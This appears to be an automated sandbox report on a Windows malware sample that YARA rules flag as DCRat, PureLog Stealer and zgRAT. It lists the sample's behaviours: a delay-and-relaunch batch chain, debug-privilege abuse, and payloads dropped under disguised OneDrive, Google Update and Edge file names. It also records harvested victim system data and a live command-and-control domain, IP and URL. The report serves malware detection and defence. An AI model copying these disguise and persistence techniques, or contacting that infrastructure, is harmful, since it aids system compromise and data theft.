Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 3600000 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 598014 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597686 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597358 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596586 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596374 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596256 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 596012 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595684 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595578 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595468 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595140 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594921 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594812 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594703 Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 594583 Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: 0JLWNg4Sz1.exe, 00000000.00000002.1711950301.000000001C637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4177598687.000000001AF90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Recovery\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerH
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ,"Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," /
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{},"5.0.1",5,1,"","user","965543","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\All Users\\Microsoft OneDrive\\setup","Unknown (Unknown)","Unknown (Unknown)","Program Manager","173.254.250.78","US / United States of America","Texas / Dallas"," / "]
Source: DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe Queries volume information: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545098 Sample: 0JLWNg4Sz1.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 46 977255cm.nyashkoon.in 2->46 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus detection for dropped file 2->54 56 13 other signatures 2->56 8 0JLWNg4Sz1.exe 4 23 2->8         started        12 StartMenuExperienceHost.exe 2->12         started        14 DViaOgnvmAhwCXZ.exe 14 3 2->14         started        17 6 other processes 2->17 signatures3 process4 dnsIp5 36 C:\Users\user\Desktop\ALzNWdSZ.log, PE32 8->36 dropped 38 C:\Recovery\StartMenuExperienceHost.exe, PE32 8->38 dropped 40 C:\Recovery\DViaOgnvmAhwCXZ.exe, PE32 8->40 dropped 44 8 other malicious files 8->44 dropped 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 64 Creates processes via WMI 8->64 19 cmd.exe 8->19         started        22 schtasks.exe 8->22         started        24 schtasks.exe 8->24         started        26 16 other processes 8->26 66 Antivirus detection for dropped file 12->66 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 48 977255cm.nyashkoon.in 188.114.96.3, 49730, 49731, 49732 CLOUDFLARENETUS European Union 14->48 42 C:\Users\user\Desktop\KjTCumlu.log, PE32 14->42 dropped file6 signatures7 process8 signatures9 58 Uses ping.exe to sleep 19->58 60 Uses ping.exe to check the status of other devices and networks 19->60 28 conhost.exe 19->28         started        30 chcp.com 19->30         started        32 PING.EXE 19->32         started        34 StartMenuExperienceHost.exe 19->34         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.96.3
 977255cm.nyashkoon.in European Union
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
977255cm.nyashkoon.in 188.114.96.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://977255cm.nyashkoon.in/secureWindows.php true unknown